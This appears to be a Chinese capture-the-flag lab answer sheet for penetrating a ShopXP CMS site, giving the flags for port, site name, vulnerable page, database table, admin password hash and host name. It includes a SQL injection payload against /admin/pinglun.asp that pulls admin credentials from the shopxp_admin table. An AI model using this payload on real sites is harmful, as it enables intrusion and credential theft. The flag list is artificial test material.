B-5:CMS网站渗透
任务环境说明:
服务器场景:Server2206(关闭链接)
服务器场景操作系统:未知
换环境有问题需要环境可以私信我
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;
FLAG=8089
2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;
FLAG=SHOPXP.cn
3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;
https://blog.csdn.net/u013102998/article/details/17373329
sql注入漏洞存在于/admin/pinglun.asp文件
FLAG=pinglun.asp
4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;
?id=1 union select 1,2,admin,4,5,password,7,8,9,10,11 from shopxp_admin
FLAG=shopxp_admin
5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;
FLAG=7a57a5a743894a0e
6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。
FLAG=workgrou-sypyia